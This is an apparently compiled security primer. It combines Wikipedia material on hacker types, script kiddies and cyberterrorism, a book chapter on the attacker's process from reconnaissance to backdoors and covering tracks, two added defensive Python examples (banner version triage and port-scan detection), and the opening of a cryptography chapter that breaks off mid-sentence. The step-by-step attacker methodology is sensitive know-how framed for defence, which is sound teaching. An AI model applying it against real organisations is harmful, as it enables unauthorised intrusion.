
Steps Of Hacking

# TYPES OF HACKERS
1. WHITE HAT


A white hat is the hero or good guy, especially in computing slang, where it refers to an ethical hacker
or penetration tester who focuses on securing and protecting IT systems.

White hat hackers, also known as "ethical hackers," are computer security experts who specialize in penetration testing
and other testing methodologies to ensure that a company's information systems are secure.
Such people are employed by companies, where they are sometimes called "sneakers"; groups of them are often
called tiger teams or red teams. These security experts may use a variety of methods to carry out their tests,
including social engineering tactics, hacking tools, and attempts to evade security controls to gain entry into secured areas.
The National Security Agency offers certifications such as CNSS 4011, which covers orderly ethical hacking
approaches and team management. Aggressor teams are called "red" teams; defender teams are called "blue" teams.
--- Source: Wikipedia

2. BLACK HAT


A black hat is the villain or bad guy, especially in a western movie, in which such a character would
wear a black hat in contrast to the hero's white hat. The phrase is often used figuratively, especially in computing slang,
where it refers to a hacker who breaks into networks or computers, or creates computer viruses.
Black hat hackers (also called "crackers") are hackers who specialize in unauthorized penetration of information systems.
They may use computers to attack systems for profit, for fun, for political motivations or as part of a social cause.
Such penetration often involves modification and/or destruction of data, and is done without authorization,
so they should not be confused with ethical hackers.
They may also distribute computer viruses and Internet worms, and deliver spam through the use of botnets.
The term may also refer to hackers who crack software to remove protection methods: copy prevention, trial/demo versions,
serial numbers, hardware keys, date checks, CD checks (no-CD) or software annoyances like nag screens and adware.
--- Source: Wikipedia

3. GREY HAT


A grey hat, in the hacking community, is a skilled hacker who sometimes acts legally, sometimes in good will,
and sometimes not: a hybrid between white and black hat hackers.
They usually do not hack for personal gain or with malicious intent,
but may occasionally commit crimes in the course of their technological exploits.
One reason a grey hat might consider himself grey is to distinguish himself from the two extremes,
black and white. For example, a grey hat may penetrate a computer system without authorization,
an illegal act in most countries, but then simply patch the security hole that gave him
access without damaging the system. In that situation he may or may not disclose his activities, because of the legal ramifications.

It is possibly misleading to say that grey hats do not hack for personal gain.
While they do not necessarily hack for malicious purposes, they do hack for a reason, and that reason more often
than not remains undisclosed. A grey hat will not necessarily notify the administrator of a penetrated system.
He will prefer anonymity at almost any cost, carrying out the penetration undetected and leaving undetected.
Consequently, grey hat penetrations tend to be passive activities such as testing, monitoring,
or less destructive forms of data transfer and retrieval.

Grey hats are also distinguished by their stance on the proper disclosure of security flaws.
A white hat will generally work with the vendor to correct the flaw, within a time frame or under certain conditions,
and may use the possibility of disclosure to pressure the vendor into releasing a patch;
the intention is to make systems safer. A black hat will generally never disclose a flaw to the public, since doing so
causes systems to be patched and greatly reduces the effectiveness of the vulnerability.
There has in fact been a long-standing controversy between black hats and the white hat policy of full disclosure.
Grey hats may or may not release vulnerabilities to the vendor or the public,
and may attempt to sell them to black hats or white hats.

In April 2000, grey hat hackers gained unauthorized access to apache.org. They could have tried to damage the
apache.org servers, write text offensive to the Apache crew, or distribute trojans or other malicious software. Instead, they
chose just to alert the Apache crew to the problems and then to publish
--- Source: Wikipedia

# How and Why Hackers Do It

Attackers break into systems for a variety of reasons and for a variety of
purposes. Until you understand how attackers break into systems and why
they do it, you will have a hard time defending against the variety of
attacks that are currently being used to compromise systems. This
chapter will take a detailed look at these issues so you can better
understand the processes, methods, and types of attacks that are
currently being used.

What Is an Exploit?

Because the topic of exploits will be addressed throughout the book, this
is probably a good time to cover what an exploit actually is.
If this were a short-answer question, the correct answer would be “an
exploit can be anything.” Basically, anything that can be used to
compromise a machine is considered an exploit. Remember, we are also
using a loose definition of the word compromise. A compromise could
include the following:
• Gaining access
• Simplifying gaining access
• Taking a system offline
• Desensitizing sensitive information

For example, going through a company’s garbage to find sensitive
information can be considered an exploit. If an attacker goes through the
garbage and finds a computer printout of top-secret information about a
company’s new product, he has technically compromised the system
without ever touching it. This is why addressing all the ways a system can
be exploited is so important. Many times, security professionals put on
blinders and look at only one aspect of security. It is important to
remember that a chain is only as strong as its weakest link, and an
attacker will compromise the weakest link in a company’s security.
Therefore, it is critical that security professionals step back and properly
look at and address all the security issues a company might face.
To look at a more formal definition, www.dictionary.com defines an exploit
as “a security hole or an instance of a security hole.” This brings out a
very important point: For there to be an exploit, there has to be a
weakness that can be compromised. If there are no weaknesses, there is
nothing to exploit. That is why most people would say that a truly secure
system is one that is not plugged into a network or any sort of electricity
and buried in 30 feet of cement under the support beams for the Brooklyn
Bridge. In this case, the number of possible exploits is minimized because
the number of weaknesses is reduced or eliminated. It is also important to
point out that, although the number of exploits is minimized, the
functionality of the system is also severely minimized. One of the main
reasons why companies do not have truly secure servers is that,
whenever you increase security, you reduce functionality, and
functionality is what keeps a company in business. The counter argument
I always make is that functionality might keep a company in business, but
lack of security will put a company out of business.
Therefore, when building secure systems, it is critical that you minimize
the risk while reducing the impact it has on overall functionality. Figure
2.1 shows the constant battle of trying to balance security, functionality,
and ease of use. Imagine that there is a ball in the triangle and you can
move it to whatever corner you want. As you move the ball toward the
corner of security, you are moving farther away from the other two

The Attacker’s Process

There are many ways an attacker can gain access or exploit a system. No
matter which way an attacker goes about it, there are some basic steps
that are followed:
1. Passive reconnaissance.
2. Active reconnaissance (scanning).
3. Exploiting the system:
   • Gaining access through the following attacks:
       • Operating system attacks
       • Application level attacks
       • Scripts and sample program attacks
       • Misconfiguration attacks
   • Elevating of privileges
   • Denial of Service
4. Uploading programs.
5. Downloading data.
6. Keeping access by using the following:
   • Backdoors
   • Trojan horses
7. Covering tracks.

Note that it is not always necessary to perform all of these steps, and in
some cases, it is necessary to repeat some of the steps. For example, an
attacker performs the active and passive reconnaissance steps and, based
on the information he gathers about the operating systems on certain
machines, he tries to exploit the system. After unsuccessfully trying all
sorts of operating system attacks (Step 3), he might go back to Steps 1
and 2. At this point, his active reconnaissance will probably be more in
depth, focusing on other applications that are running or possible scripts
that are on the system, and even trying to find out more information
about the operating system, such as revision and patch levels. After he
has more information, he will go back to attacking the system.

You would hope that, by protecting your systems from attack, this process
would take a long time to accomplish, frustrating the attacker enough to
give up before he gains access. Ideally, a company should have proper
Intrusion Detection Systems in place so that it can detect an attack and
protect against it before it does any damage. Most companies should
strive for this, but unfortunately most ignore it.

Let’s briefly run through each of the steps from an attacker’s point of
view. The attacker starts off seeing if he has any general information
about the system. This consists of information like the domain name and
any servers or systems the company might have. After all of the passive
information has been gathered, active reconnaissance begins. This is
where the attacker tries to find out as much information about the
systems, without setting off too many alarms. Then, he gathers things
such as IP addresses, open ports, operating system and version, and so
on. After some initial information is gathered, an attacker steps through
each of the attack areas: operating system, applications, scripts, and
misconfigured systems. For each item, an attacker tries an attack; if
unsuccessful, he tries to gather more information about the component.
After all the information has been gathered for an item, an attacker moves
on to the next item. After an attack has been successful and access has
been gained, the attacker then uploads any necessary programs,
preserves access by installing Trojan horses, and finally cleans up the
system to hide the attack.

Passive Reconnaissance

To exploit a system, an attacker must have some general information;
otherwise, he does not know what to attack. A professional burglar does
not rob houses randomly. Instead, he picks someone, like Bob, and he
begins the passive reconnaissance stage of figuring out where Bob’s house
is located and other general information.

The same thing has to be done with hacking. After an attacker picks a
company to go after, he has to find out the company’s name and where it
is located on the Internet. Chapter 3, “Information Gathering,” covers this
in detail. The sections in this chapter on reconnaissance are meant to lay
the groundwork for Chapter 3.
Passive information gathering is not always useful by itself, but is a
necessary step, because knowing that information is a prerequisite to
performing the other steps. In one case, I was gathering information to
perform an authorized penetration test for a company.
I pulled up to the company around 4:00 p.m. I chose this time for two
reasons. First, because most people leave between 4:30 p.m. and 5:30
p.m., I could observe a lot of behavior, but to do so I needed to park near
the front of the building. Usually, that late in the day, some people have
already left and you can get a close spot—thus, the second reason. I
parked near the entrance and rolled down my window. Three people came
out and stopped in front of my car to have a smoke. As they smoked, they
talked about business and a new server they just installed. It was set up
for testing file transfer and FTP access to remote offices, but they went on
to explain that, because they were having trouble with authentication,
they allowed anonymous access. As they finished the conversation, they
started joking with the one person on why he named the server Alpha-Two.
In the course of five minutes, I was given the name of a server that was
accessible from the Internet and the fact that authentication was turned
off, which meant that I had full access to the network! As fictitious as this
story might sound, it actually happened and is quite realistic. It is amazing
what people will say if they think that no one else is listening.
In some cases, passive reconnaissance can provide everything an attacker
needs to gain access. On the surface it might seem like passive
reconnaissance is not that useful, but do not underestimate the amount of
information an attacker can acquire if it is done properly.
Passive attacks, by nature of how they work, might not seem as powerful
as active attacks, but in some cases they can be more powerful. With
passive attacks, you do not directly get access, but sometimes you get
something even better: guaranteed access across several avenues.
One of the most popular types of passive attacks is sniffing. This involves
sitting on a network segment and watching and recording all traffic that
goes by. This can yield a lot of information. For example, if an attacker is
looking for a specific piece of information, he might have to search
through hundreds of megabytes of data to find what he is looking for. In
other cases, if he knows the pattern of the packets he is looking for, it can
be quite easy.
An example of this is sniffing passwords. There are programs that
attackers can run from a workstation that looks for NT authentication
packets. When it finds one, it pulls out the encrypted password and saves
it. An attacker can then use a password cracker to get the plain text
password. To get a single password, this might seem like a lot of work.
But imagine an attacker setting this up to start running at 7:00 a.m. and
stop running at 10:00 a.m. Most people log on to the network in those
three hours, so he can gather hundreds of passwords in a relatively short
time period.
Another useful type of passive attack is information gathering. During this
type of attack, an attacker gathers information that will help launch an
active attack. For example, let’s say that an attacker sits near the loading
dock of a company to watch deliveries. Most companies print their logos
on the sides of boxes and are easy to spot. If an attacker notices that you
receive several Sun boxes, he can be pretty sure that you are running
Solaris. If, shortly after the release of Windows 2000, a company receives
boxes from Microsoft, an attacker could probably guess that the company
is upgrading its servers to the new operating system.

Active Reconnaissance

At this point, an attacker has enough information to try active probing or
scanning against a site. After a burglar knows where a house is located
and if it has a fence, a dog, bars on the windows, and so on, he can
perform active probing. This consists of going up to the house and trying
the windows and doors to see if they are locked. If they are, he can look
inside to see what types of locks there are and any possible alarms that
might be installed. At this point, the burglar is still gathering information.
He is just doing it in a more forceful or active way.
With hacking, the same step is performed. An attacker probes the system
to find out additional information. The following is some of the key
information an attacker tries to discover:
• Hosts that are accessible
• Locations of routers and firewalls
• Operating systems running on key components
• Ports that are open
• Services that are running
• Versions of applications that are running
The more information an attacker can gain at this stage, the easier it will
be when he tries to attack the system. Usually, the attacker tries to find
out some initial information covertly and then tries to exploit the system.
If he can exploit the system, he moves on to the next step. If he cannot
exploit the system, he goes back and gathers more information. Why
gather more information than he needs, especially if gathering that extra
information sets off alarms and raises suspicion? It is an iterative process,
where an attacker gathers a little, tests a little, and continues in this
fashion until he gains access.
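The "versions of applications that are running" item is where a scanner's raw output has to become something an attacker, or a defender doing inventory, can act on. The Python below is an added example, not code from the book or from this page: it parses constructed SSH, FTP, SMTP and HTTP banners into service, product and version, and compares each version against an operator-supplied patch baseline. The banner patterns cover only a few daemons, and the baseline values are assumptions for illustration, not statements about which versions are vulnerable.

```python
# Added example: turn raw service banners from active reconnaissance into
# (service, product, version) fingerprints and flag versions below a baseline.
import re
from typing import Dict, Optional

# Illustrative patterns for four common banner formats; anything else is "unknown".
_RULES = [
    ("ssh", re.compile(r"^SSH-[\d.]+-(?P<product>[A-Za-z]+)[_-](?P<version>[\w.]+)")),
    ("ftp", re.compile(r"^220[ -].*?(?P<product>vsFTPd|ProFTPD|Pure-FTPd)\s*(?P<version>\d[\w.]*)?", re.I)),
    ("smtp", re.compile(r"^220[ -]\S+\s+E?SMTP\s+(?P<product>Postfix|Exim|Sendmail)\s*(?P<version>\d[\w.]*)?", re.I)),
    ("http", re.compile(r"^Server:\s*(?P<product>[A-Za-z][\w-]*)(?:/(?P<version>[\w.]+))?", re.I | re.M)),
]


def fingerprint(banner: str) -> Dict[str, Optional[str]]:
    """Classify one banner. Unknown fields are None; unmatched banners are 'unknown'."""
    for service, rule in _RULES:
        m = rule.search(banner)
        if m:
            return {"service": service, "product": m.group("product"), "version": m.group("version")}
    return {"service": "unknown", "product": None, "version": None}


def version_key(version: str):
    """Rough ordering key: the numeric runs of a version string, '7.4p1' -> (7, 4, 1).
    Enough for an 'older than baseline' check; not a full semver/dpkg comparison."""
    return tuple(int(n) for n in re.findall(r"\d+", version))


def below_baseline(fp: Dict[str, Optional[str]], baseline: Dict[str, str]) -> bool:
    """True when the product has a baseline entry and the seen version sorts below it."""
    if not fp["product"] or not fp["version"]:
        return False  # nothing to compare: unknown product or a version-less banner
    floor = baseline.get(fp["product"].lower())
    return floor is not None and version_key(fp["version"]) < version_key(floor)


def triage(banners, baseline):
    """Fingerprint every (host, port) -> banner entry and attach the baseline verdict."""
    findings = []
    for (host, port), banner in banners.items():
        fp = fingerprint(banner)
        findings.append({"host": host, "port": port, **fp,
                         "below_baseline": below_baseline(fp, baseline)})
    return sorted(findings, key=lambda f: (f["host"], f["port"]))


# Constructed banners and an assumed baseline, for illustration only.
SAMPLE_BANNERS = {
    ("192.0.2.10", 22): "SSH-2.0-OpenSSH_7.4p1 Debian-10+deb9u7",
    ("192.0.2.10", 21): "220 ProFTPD 1.3.5 Server (ProFTPD Default Installation) [192.0.2.10]",
    ("192.0.2.11", 25): "220 mail.example.test ESMTP Postfix (Debian/GNU)",
    ("192.0.2.12", 80): "HTTP/1.1 200 OK\r\nServer: Apache/2.4.29 (Ubuntu)\r\nContent-Length: 0\r\n\r\n",
    ("192.0.2.13", 8080): "\x16\x03\x01\x00\x05",  # TLS bytes on a plaintext probe: no text banner
}
ASSUMED_BASELINE = {"openssh": "8.0", "proftpd": "1.3.5", "apache": "2.4.50"}

if __name__ == "__main__":
    for finding in triage(SAMPLE_BANNERS, ASSUMED_BASELINE):
        print(finding)
```

Two things the paragraph alone does not show: a banner with no version (the Postfix line) must come back as "unknown version", not as "patched", and a version string like 7.4p1 needs a numeric key before it can be ordered, otherwise string comparison puts "7.4p1" after "7.4" but also "10.0" before "8.0".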
Keep in mind that, as an attacker performs additional active
reconnaissance, his chances of detection increase because he is actively
performing some action against the company. It is critical that you have
some form of logging and review in place to catch active reconnaissance,
because, in a lot of cases, if you cannot block an attacker here, your
chances of detecting him later decrease significantly.
When I perform an assessment, usually I run some tests to figure out the
IP address of the firewall and routers. Next, I try to determine the type of
firewall, routers, and the version of the operating system the company is
running to see if there are any known exploits for those systems. If there
are known exploits, I compromise those systems. At that point, I try to
determine which hosts are accessible and scan those hosts to determine
which operating system and revision levels they are running. If an
attacker can gain access to the external router or firewall, he can gather a
lot of information and do a lot of damage.
For example, if I find that a server is running Windows NT 4.0 Service
Pack 4, I scan for all vulnerabilities with that version and try to use those
vulnerabilities to exploit the system. Surprisingly, with most companies,
when I perform active reconnaissance, their technical staff fails to detect
that I have probed their systems. In some cases, it is because they are
not reviewing their log files, but in most cases, it is because they are not
logging the information. Logging is a must, and there is no way to get
around it. If you do not know what an attacker is doing on your system,
how can you protect against it?
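The logging point made above only pays off if something actually reads the logs for the pattern active reconnaissance leaves. As an added example (not from Hackers Beware or from this page), the Python below runs a simple scan detector over constructed iptables-style firewall DROP lines: a source that touches many distinct ports on one host inside a time window is reported as a vertical scan, and one port on many hosts as a horizontal scan. The log format, the assumed year for syslog timestamps, the window and the thresholds are all assumptions to be tuned against a real log source.

```python
# Added example: flag port scans in iptables-style kernel firewall logs.
import re
from collections import defaultdict
from datetime import datetime

# Matches lines like
#   "Jan 12 09:14:00 fw kernel: DROP IN=eth0 ... SRC=a DST=b ... PROTO=TCP ... DPT=22 ..."
# The field layout is an assumption about the log source; adjust for yours.
LOG_RE = re.compile(
    r"^(?P<ts>[A-Z][a-z]{2}\s+\d+\s+\d\d:\d\d:\d\d)\s+\S+\s+kernel:\s+(?P<action>\w+)\s.*?"
    r"\bSRC=(?P<src>[\d.]+)\s+DST=(?P<dst>[\d.]+)\b.*?\bPROTO=(?P<proto>\w+)\b.*?\bDPT=(?P<dpt>\d+)\b"
)
LOG_YEAR = 2024  # syslog timestamps carry no year; assumed so they can be parsed


def parse_line(line):
    """Return a dict for a firewall line, or None for anything else (sshd, cron, ...)."""
    m = LOG_RE.match(line)
    if not m:
        return None
    ts = datetime.strptime(f"{LOG_YEAR} {m['ts']}", "%Y %b %d %H:%M:%S")
    return {"ts": ts, "action": m["action"], "src": m["src"], "dst": m["dst"],
            "proto": m["proto"], "dpt": int(m["dpt"])}


def detect_scans(lines, window_s=60, port_threshold=10, host_threshold=10):
    """Slide a time window over each source's events; report the first window in which
    one host sees >= port_threshold distinct ports (vertical) or one port is tried on
    >= host_threshold distinct hosts (horizontal). Counts are as of first detection."""
    by_src = defaultdict(list)
    for line in lines:
        ev = parse_line(line)
        if ev:
            by_src[ev["src"]].append(ev)
    alerts, seen = [], set()
    for src, evs in by_src.items():
        evs.sort(key=lambda e: e["ts"])
        left = 0
        for right in range(len(evs)):
            while (evs[right]["ts"] - evs[left]["ts"]).total_seconds() > window_s:
                left += 1
            window = evs[left:right + 1]
            ports_per_host, hosts_per_port = defaultdict(set), defaultdict(set)
            for e in window:
                ports_per_host[e["dst"]].add(e["dpt"])
                hosts_per_port[e["dpt"]].add(e["dst"])
            checks = ([("vertical", dst, ports, port_threshold) for dst, ports in ports_per_host.items()]
                      + [("horizontal", f"port {port}", hosts, host_threshold)
                         for port, hosts in hosts_per_port.items()])
            for kind, target, members, threshold in checks:
                key = (src, kind, target)
                if len(members) >= threshold and key not in seen:
                    seen.add(key)
                    alerts.append({"src": src, "kind": kind, "target": target, "count": len(members),
                                   "first": window[0]["ts"], "last": window[-1]["ts"]})
    return alerts


def _line(ts, src, dst, dpt, proto="TCP"):
    """Build one constructed DROP line in the assumed format."""
    return (f"{ts} fw kernel: DROP IN=eth0 OUT= MAC=00:11:22:33:44:55 "
            f"SRC={src} DST={dst} LEN=60 TTL=54 PROTO={proto} SPT=44123 DPT={dpt} SYN")


# Constructed sample log: one vertical scan, one horizontal scan, benign repeats, one non-firewall line.
SAMPLE_LOG = (
    [_line(f"Jan 12 09:14:{i:02d}", "203.0.113.5", "192.0.2.10", 20 + i) for i in range(20)]
    + [_line(f"Jan 12 09:30:{i:02d}", "198.51.100.7", f"192.0.2.{100 + i}", 445) for i in range(12)]
    + [_line(f"Jan 12 10:0{i}:00", "192.0.2.50", "192.0.2.10", 443) for i in range(3)]
    + ["Jan 12 09:14:05 fw sshd[812]: Accepted publickey for ops from 192.0.2.50 port 51022"]
)

if __name__ == "__main__":
    for alert in detect_scans(SAMPLE_LOG):
        print(alert)
```

The window matters as much as the thresholds: a patient attacker who probes one port a minute never accumulates ten distinct ports inside a 60-second window, so a second, longer window (hours) with the same counting logic is the usual complement.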
The goal of a company in protecting its computers and networks is to
make it so difficult for an attacker to gain access that he gives up before
he gets in. Today, because so many sites have minimal or no security,
attackers usually gain access relatively quickly and with a low level of
expertise. Therefore, if a company’s site has some security, the chances of
an attacker exploiting its systems are decreased significantly, because if
he meets some resistance, he will probably move on to a more vulnerable
site. This is only true for an opportunistic attacker who scans the Internet
looking for any easy target.
In cases of corporate espionage, where an attacker is targeting your site,
some security will make the attacker’s job more difficult, but will not
necessarily stop him. In this situation, hopefully the extra security will
make it so difficult that you will detect the attack before he gains access
and stop him before any damage is done.

In most cases, an attacker uses a passive reconnaissance attack first to
properly position himself. Next, he uses an active reconnaissance attack to
gather the information he is after. An example is an attacker breaking into
a machine so that he can sniff passwords off of the network when users
log on each morning. As this example shows, to perform active
reconnaissance, an attacker must have some level of access to the
system.

Each attack has value, but as you will see throughout this book, the real
value is gained when multiple techniques or attacks are combined. Giving
a carpenter a single tool allows him to build part of a house. When a
carpenter is familiar, well-trained, and has several tools in his toolbox, he
can build an entire house. These same principles apply for successfully
breaking into a system—or in our case, successfully preventing a break-in.

Exploiting the System

Now comes the scary part for a security professional. When most people
think about exploiting a system, they only think about gaining access, but
there are actually two other areas: elevation of privileges and denial of
services. All three are useful to the attacker depending on the type of
attack he wants to launch. There are also cases where they can be used in
conjunction with each other. For example, an attacker might be able to
compromise a user’s account to gain access to the system, but because he
does not have root access, he cannot copy a sensitive file. At this point,
the attacker would have to run an elevation of privileges attack to
increase his security level so that he can access the appropriate files.

It is also important to note that an attacker can exploit a system to use it
as a launching pad for attacks against other networks. This is why system
break-ins are not always noticed, because attackers are not out to do
direct harm or steal information. In these cases, a company’s valuable
resources are being used and, technically, that company is hacking into
other companies.

Think about this for a minute: Whether it is authorized or not, if someone
is using Company A’s computers to break into Company B, when Company
B investigates, it will point back to Company A. This is called a
downstream liability problem. This can have huge legal implications for a
company if it is not careful—especially if the attackers want to have some
fun and carefully pick the two companies so that Company A and B are
major competitors. If you are the head of security for Company A, you
better hope that your resume is updated.

--- Eric Cole, Hackers Beware (New Riders Publishing)

# SCRIPT KIDDIE

In hacker culture, a script kiddie (occasionally script bunny, skiddie, script kitty, script-running juvenile (SRJ), or similar) is a derogatory term for someone who uses scripts or programs developed by others to attack computer systems and networks. It is generally assumed that script kiddies are juveniles who lack the ability to write sophisticated hacking programs or exploits on their own, and that their objective is to impress their friends or gain credit in underground hacker communities.[1]

Tools

Script kiddies have at their disposal a large number of effective, easily downloadable malicious programs capable of harassing even well-defended computers and networks.[1] Such programs have included WinNuke applications, Back Orifice, NetBus, Sub7, Metasploit, ProRat and, often, software intended for legitimate security auditing.

Another simple means of attack is a mass-mailer worm. These spread through e-mail and, once opened, can automatically send themselves on through entire systems, often without the users realizing it. The purpose of a worm varies, from sapping the targeted computer or network of bandwidth and therefore slowing performance, to deleting or encrypting files; other payloads are possible.

In a denial-of-service (DoS) attack, the attacker tries to shut down network activity on a target system by exhausting the network's bandwidth or the system's other resources. A number of distinct DoS attacks pursue this goal through different means, such as SYN floods, ICMP floods (the amplified Smurf attack is one form) and ping floods. If the server is overwhelmed with excessive traffic, it stops responding and may require a restart.[2]

--- Source: Wikipedia

# CYBERTERRORISM

Cyberterrorism is a controversial term. Some authors choose a very narrow definition, relating to deployments,
by known terrorist organizations, of disruption attacks against information systems for the primary purpose
of creating alarm and panic. By this narrow definition, it is difficult to identify any instances of cyberterrorism.
Cyberterrorism can also be defined much more generally, for example as "the premeditated use of disruptive activities,
or the threat thereof, against computers and/or networks, with the intention to cause harm or further social,
ideological, religious, political or similar objectives, or to intimidate any person in furtherance of such objectives."
This broad definition was created by Kevin G. Coleman of the Technolytics Institute. The term itself was coined by Barry C. Collin.
As the Internet becomes more pervasive in all areas of human endeavor, individuals or groups can use the anonymity
afforded by cyberspace to threaten citizens, specific groups (for example those defined by ethnicity or belief),
communities and entire countries, without the inherent threat of capture, injury
or death that being physically present would bring.
As the Internet continues to expand, and computer systems are assigned more responsibility
while becoming more complex and interdependent, sabotage or terrorism via cyberspace may become
a more serious threat.

The basic definition of cyberterrorism
Cyberterrorism is the leveraging of a target's computers and information , particularly via the Internet, to cause physical,
real-world harm or severe disruption of infrastructure.

...subsumed over time to encompass such things as simply defacing a web site or server, or attacking non-critical systems,
resulting in the term becoming less useful...

There are some that say cyberterrorism does not exist and is really a matter of hacking or information warfare.
They disagree with labeling it terrorism because of the unlikelihood of the creation of fear, significant physical harm,
or death in a population using electronic means, considering current attack and protective technologies.

The National Conference of State Legislatures (NCSL), a bipartisan organization of legislators and their staff created to
help policymakers in all 50 states address vital issues such as those affecting the economy or homeland security
by providing a forum for exchanging ideas, sharing research and obtaining technical assistance,
defines cyberterrorism as follows:

the use of information technology by terrorist groups and individuals to further their agenda.
This can include use of information technology to organize and execute attacks against networks,
computer systems and telecommunications infrastructures, or for exchanging information or making threats electronically.
Examples are hacking into computer systems, introducing viruses to vulnerable networks, web site defacing,
denial-of-service attacks, or terroristic threats made via electronic communication.

Background Information
Public interest in cyberterrorism began in the late 1980s. As the year 2000 approached, the fear and uncertainty
about the millennium bug heightened and interest in potential cyberterrorist attacks also increased. However,
although the millennium bug was by no means a terrorist attack or plot against the world or the United States,
it did act as a catalyst in sparking the fears of a possibly large-scale devastating cyber-attack. Commentators noted that many
of the facts of such incidents seemed to change, often with exaggerated media reports.

The high-profile terrorist attacks in the United States on September 11, 2001 led to further media coverage
of the potential threats of cyberterrorism in the years that followed. Mainstream media coverage often discusses the possibility
of a large attack making use of computer networks to sabotage critical infrastructures with the aim of putting human
lives in jeopardy or causing disruption on a national scale, either directly or by disruption of the national economy.

Authors such as Winn Schwartau and John Arquilla are reported to have had considerable financial success selling
books which described what were purported to be plausible scenarios of mayhem caused by cyberterrorism.
Many critics claim that these books were unrealistic in their assessments of whether the attacks described
(such as nuclear meltdowns and chemical plant explosions) were possible.
A common thread throughout what critics perceive as cyberterror-hype is that of non-falsifiability; that is,
when the predicted disasters fail to occur, it only goes to show how lucky we've been so far, rather than impugning the theory.

Effects of cyberterrorism
Cyberterrorism can have a serious large-scale influence on significant numbers of people.
It can greatly weaken a country's economy, stripping it of resources and making it more vulnerable to military attack.

Cyberterror can also affect internet-based businesses. Like brick and mortar retailers and service providers,
most websites that produce income (whether by advertising, monetary exchange for goods or paid services)
could stand to lose money in the event of downtime created by cyber criminals.

As internet-businesses have increasing economic importance to countries, what is normally cybercrime becomes more
political and therefore "terror" related.

Examples of cyberterrorism
One example of cyberterrorists at work was when terrorists in Romania illegally gained access to the
computers controlling the life support systems at an Antarctic research station, endangering the 58 scientists involved.
However, the culprits were stopped before damage actually occurred. Mostly non-political acts of sabotage have
caused financial and other damage, as in the case where a disgruntled employee caused the release of untreated sewage into
waterways in Maroochy Shire, Australia.[3] Computer viruses have degraded or shut down some non-essential
systems in nuclear power plants, but this is not believed to have been a deliberate attack.

More recently, in May 2007 Estonia was subjected to a mass cyber-attack in the wake of the removal of a Russian
World War II war memorial from downtown Tallinn. The attack was a distributed denial of service attack in which selected
sites were bombarded with traffic to force them offline; nearly all Estonian government ministry networks, as well as
two major Estonian bank networks, were knocked offline. In addition, the website of the political party of Estonia's
then Prime Minister Andrus Ansip carried a counterfeit letter of apology from Ansip for removing the memorial statue.
Despite speculation that the attack had been coordinated by the Russian government, Estonia's defense minister admitted
he had no evidence linking the cyber attacks to Russian authorities. Russia called accusations of its involvement
"unfounded," and neither NATO nor European Commission experts were able to find proof of official Russian government
participation.[3] In January 2008 a man from Estonia was convicted of launching the attacks against the Estonian
Reform Party website and fined.

Even more recently, in October 2007, the website of Ukrainian president Viktor Yushchenko was attacked by hackers.
A radical Russian nationalist youth group, the Eurasian Youth Movement, claimed responsibility.

Since the world of computers is ever-growing and still largely unexplored,
countries new to the cyber-world produce young computer scientists usually interested in
"having fun". Countries like China, Greece, India, Israel, and South Korea have all been in the spotlight before
by the U.S. media for attacks on information systems related to the CIA and NSA. Though these attacks are usually the result
of curious young computer programmers, the United States has more than legitimate concerns about national security when
such critical information systems fall under attack. In the past five years, the United States has taken a larger
interest in protecting its critical information systems. It has issued contracts for high-level research in
electronic security to nations such as Greece and Israel, to help protect against more serious and dangerous attacks.
In 1999 hackers attacked NATO computers. The computers flooded them with email and hit them with a
denial of service (DoS). The hackers were protesting against the NATO bombings in Kosovo. Businesses,
public organizations and academic institutions were bombarded with highly politicized emails
containing viruses from other European countries.


Countering cyberterrorism
The US Department of Defense charged the United States Strategic Command with the duty of combating cyberterrorism.
This is accomplished through the Joint Task Force-Global Network Operations (JTF-GNO). JTF-GNO is the operational
component supporting USSTRATCOM in defense of the DoD's Global Information Grid. This is done by integrating GNO
capabilities into the operations of all DoD computers, networks, and systems used by DoD combatant commands, services and
agencies.

On November 2, 2006, the Secretary of the Air Force announced the creation of the Air Force's newest MAJCOM,
the Air Force Cyber Command, which will be tasked to monitor and defend American interests in cyberspace.
The AFCC will draw upon the personnel resources of the 67th Network Warfare Wing as well as
other resources of the Eighth Air Force; it will be placed under the command of Lieutenant
General Robert J. Elder, Jr., and was designated to stand up around summer 2007.



# CRYPTOGRAPHY



Introduction :)

Cryptography is everywhere these days, from hashed passwords to encrypted
mail, to Internet Protocol Security (IPSec) virtual private networks (VPNs) and
even encrypted filesystems. Security is the reason why people opt to encrypt
data, and if you want your data to remain secure you’d best know a bit about
how cryptography works. This chapter certainly can’t teach you how to become a
professional cryptographer—that takes years of study and practice—but you will
learn how most of the cryptography you will come in contact with functions
(without all the complicated math, of course).
We’ll examine some of the history of cryptography and then look closely at a
few of the most common algorithms, including Advanced Encryption Standard
(AES), the recently announced new cryptography standard for the U.S. government.
We’ll learn how key exchanges and public key cryptography came into
play, and how to use them. I’ll show you how almost all cryptography is at least
theoretically vulnerable to brute force attacks.
Naturally, once we’ve covered the background we’ll look at how cryptography
can be broken, from cracking passwords to man-in-the-middle-type
attacks. We’ll also look at how other attacks based on poor implementation of
strong cryptography can reduce your security level to zero. Finally, we’ll examine
how weak attempts to hide information using outdated cryptography can easily
be broken.

Understanding Cryptography Concepts :)

What does the word crypto mean? It has its origins in the Greek word kruptos,
which means hidden. Thus, the objective of cryptography is to hide information
so that only the intended recipient(s) can “unhide” it. In crypto terms, the hiding
of information is called encryption, and when the information is unhidden, it is
called decryption. A cipher is used to accomplish the encryption and decryption.
Merriam-Webster’s Collegiate Dictionary defines cipher as “a method of transforming
a text in order to conceal its meaning.” The information that is being
hidden is called plaintext; once it has been encrypted, it is called ciphertext. The
ciphertext is transported, secure from prying eyes, to the intended recipient(s),
where it is decrypted back into plaintext.

History :)

According to Fred Cohen, the history of cryptography has been documented
back to over 4000 years ago, where it was first allegedly used in Egypt. Julius
Caesar even used his own cryptography called Caesar’s Cipher. Basically, Caesar’s
Cipher rotated the letters of the alphabet to the right by three. For example, S
moves to V and E moves to H. By today’s standards the Caesar Cipher is
extremely simplistic, but it served Julius just fine in his day. If you are interested
in knowing more about the history of cryptography, the following site is a great
place to start: www.all.net/books/ip/Chap2-1.html.
In fact, ROT13 (rotate 13), which is similar to Caesar’s Cipher, is still in use
today. It is not used to keep secrets from people, but more to avoid offending
people when sending jokes, spoiling the answers to puzzles, and things along
those lines. If such things occur when someone decodes the message, then the
responsibility lies on them and not the sender. For example, Mr. G. may find the
following example offensive to him if he was to decode it, but as it is shown it
offends no one: V guvax Jvaqbjf fhpxf…
ROT13 is simple enough to work out with pencil and paper. Just write the
alphabet in two rows; the second row offset by 13 letters:
ABCDEFGHIJKLMNOPQRSTUVWXYZ
